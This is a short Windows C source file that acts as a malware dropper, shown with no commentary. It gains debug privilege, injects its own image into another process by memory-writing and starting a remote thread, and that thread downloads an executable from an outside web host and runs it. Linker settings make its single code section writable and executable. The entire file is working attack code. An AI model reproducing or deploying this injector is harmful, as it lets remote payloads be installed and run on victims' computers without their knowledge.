#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "urlmon.lib")
#include <windows.h>
void InjectMemo()
{
URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);
WinExec("c:/upiea.exe", SW_SHOW);
ExitThread(0);
}
void GetDebugPrivs()
{
HANDLE hToken;
DWORD ReGvl;
TOKEN_PRIVILEGES Ttges;
if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
LookupPrivilegeValue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);
Ttges.PrivilegeCount=1;
Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);
}
}
void InjectPro()
{
DWORD Size,PID;
PBYTE module;
module = (PBYTE)GetModuleHandle(0);
Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
HANDLE ProcessHandle;
LPVOID heart;
GetDebugPrivs();
GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);
CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);
}